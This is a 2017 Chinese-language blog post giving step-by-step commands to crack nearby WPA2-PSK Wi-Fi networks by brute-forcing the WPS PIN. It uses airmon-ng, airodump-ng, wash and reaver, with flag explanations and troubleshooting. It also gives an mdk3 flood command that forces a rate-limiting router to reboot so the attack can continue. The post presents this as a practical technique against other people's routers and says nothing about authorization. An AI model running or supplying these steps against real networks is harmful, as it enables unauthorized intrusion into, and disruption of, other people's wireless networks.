使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络

4820阅读 0评论2017-11-21 gpf626487
分类:LINUX

【前言】

  现在的路由器大多都默认用 WPA2-PSK 方式对无线网络进行加密了,不能再像 WEP 加密方式那样好破解,使用字典又需要费心费力地整理字典,而且字典破解的效率还慢。所以我们需要更有效率的破解方法。好在现在大多数的路由器都提供 WPS 功能,通过这个功能,用户可以使用 PIN 码登录到路由器。但这个 PIN 码的长度只有 8 位,而且可能的取值只有11000种(注意,不是 10^8 种)。所以我们可以进行简单粗暴的穷举 PIN 码破解,而且我们可以推断出这种破解方法在目标 AP 开启了 WPS 功能的情况下是可以百分之百破解它的。这其实是很老的破解手段了,但至今依然奏效。


【操作步骤】

1、切换无线网卡到监听模式:
  airmon-ng start wlan0

2、刺探附近 WLAN 网络(这个命令所跟的参数值可以在 步骤1 完成后从提示信息中查看到):
  airodump-ng wlan0mon

  

3、找出开启了 WPS 功能、可以使用 PIN码 登录的路由器,并另外记录下该 AP 的 BSSID(约等于该 AP 的 MAC 地址):
  wash -i wlan0mon

  

3、开始进行 PIN码 穷举破解(注意末尾的参数是 2 个小写字母 v):
  reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv

参数说明:
-i  无线网卡名称
-b  目标AP的mac地址
-a  自动检测目标AP最佳配置
-S  使用最小的DH key,可以提高破解速度
-vv  显示更多的非严重警告(注意这是 2 个小写字母 v)
-d  即delay每穷举一次的闲置时间 预设为1秒
-c  信道编号
-p  PIN码(四位或八位)

  


4、等待破解完成(这个破解可能会时间比较长,和你的目标 AP 有关,我当时花费了 12 个小时才破解出来),这期间我们可以查看到穷举破解花费的时间、预计剩余时间、穷举PIN码进度 信息:

  

破解完成后,查看并记录下 PIN码 和 密码:

  


【注意事项】

  1、如果在执行 reaver 命令后看到有 WARNING: Failed to associate with xx:xx:xx:xx:xx:xx 这样的提示信息,那么应该是你选择了一个不具备或关闭了 WPS 功能的路由器。这种情况下就执行wash 命令并重新选择一个路由器吧。

  2、如果在执行 reaver 命令后看到有 warning detected ap rate limiting waiting 60 seconds before re-checking 这样的提示信息,这表示目标路由器开启了防 PIN破解 功能。因为我们是穷举 PIN码 进行破解的,当连续使用超过某个次数的 PIN码 后,路由器会暂时锁定 WPS 功能一段时间。这种情况下要么我们耐心等待其恢复 WPS 功能,要么执行 mdk3 wlan0mon a -a xx:xx:xx:xx:xx:xx (这是上面的目标AP的MAC地址)命令让路由器主动重启或被动重启以恢复 WPS 功能。

上一篇:python 机器学习的开发环境搭建(numpy,scipy,matplotlib)
下一篇:库-libev:详解